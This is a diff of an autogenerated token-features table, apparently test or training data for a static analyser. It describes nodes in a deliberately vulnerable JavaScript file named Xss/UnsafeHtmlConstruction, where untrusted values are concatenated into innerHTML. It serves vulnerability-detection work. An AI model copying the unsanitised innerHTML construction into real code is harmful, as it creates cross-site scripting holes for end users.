constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:47 | attrVal | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:47 | attrVal | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:47 | attrVal | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:47 | attrVal | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | attrVal.indexOf("'") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | attrVal.indexOf("'") | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | attrVal.indexOf("'") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | attrVal.indexOf("'") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | attrVal.indexOf("'") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | exceptional return of attrVal.indexOf("'") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | exceptional return of attrVal.indexOf("'") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | exceptional return of attrVal.indexOf("'") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | exceptional return of attrVal.indexOf("'") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:60 | exceptional return of attrVal.indexOf("'") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:67 | attrVal ... === -1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:67 | attrVal ... === -1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:67 | attrVal ... === -1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:67 | attrVal ... === -1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:41:69:67 | attrVal ... === -1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:49:69:55 | indexOf | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:49:69:55 | indexOf | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:49:69:55 | indexOf | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:49:69:55 | indexOf | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:49:69:55 | indexOf | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:57:69:59 | "'" | CalleeFlexibleAccessPath | attrVal.indexOf | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:57:69:59 | "'" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:57:69:59 | "'" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23189,6 +152662,51 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:57:69:59 | "'" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:57:69:59 | "'" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:57:69:59 | "'" | receiverName | attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:66:69:67 | -1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:66:69:67 | -1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:66:69:67 | -1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:66:69:67 | -1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:66:69:67 | -1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:67:69:67 | 1 | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:67:69:67 | 1 | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:67:69:67 | 1 | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:67:69:67 | 1 | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:69:67:69:67 | 1 | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:16 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:16 | document | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:16 | document | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:16 | document | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:16 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:30 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:30 | documen ... elector | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:30 | documen ... elector | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:30 | documen ... elector | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:30 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | documen ... ("#id") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | documen ... ("#id") | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | documen ... ("#id") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | documen ... ("#id") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | documen ... ("#id") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | exceptional return of documen ... ("#id") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | exceptional return of documen ... ("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | exceptional return of documen ... ("#id") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | exceptional return of documen ... ("#id") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:37 | exceptional return of documen ... ("#id") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:47 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:47 | documen ... nerHTML | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:47 | documen ... nerHTML | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:47 | documen ... nerHTML | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:47 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:82 | documen ... "\\"/>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:82 | documen ... "\\"/>" | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:82 | documen ... "\\"/>" | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:82 | documen ... "\\"/>" | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:9:70:82 | documen ... "\\"/>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:18:70:30 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:18:70:30 | querySelector | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:18:70:30 | querySelector | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:18:70:30 | querySelector | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:18:70:30 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:32:70:36 | "#id" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:32:70:36 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:32:70:36 | "#id" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23197,12 +152715,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:32:70:36 | "#id" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:32:70:36 | "#id" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:32:70:36 | "#id" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:39:70:47 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:39:70:47 | innerHTML | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:39:70:47 | innerHTML | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:39:70:47 | innerHTML | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:39:70:47 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:51:70:63 | "\\"" document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:51:70:63 | "\\""' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:51:70:73 | " attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:51:70:73 | "" | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:51:70:82 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:51:70:82 | "" | contextSurroundingFunctionParameters | (attrVal) | @@ -23221,29 +152749,146 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:77:70:82 | "\\"/>" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:77:70:82 | "\\"/>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:70:77:70:82 | "\\"/>" | stringConcatenatedWith | '' + attrVal -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:34 | module. ... emplate | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:34 | module. ... emplate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:74:34 | module. ... emplate | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:77:1 | module. ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:77:1 | module. ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:1:77:1 | module. ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:8:74:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:8:74:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:8:74:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:16:74:34 | intentionalTemplate | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:16:74:34 | intentionalTemplate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:16:74:34 | intentionalTemplate | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:74:37 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:74:37 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:74:37 | this | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:74:37 | this | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:74:37 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | 'arguments' object of anonymous function | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | 'arguments' object of anonymous function | enclosingFunctionName | intentionalTemplate | +| 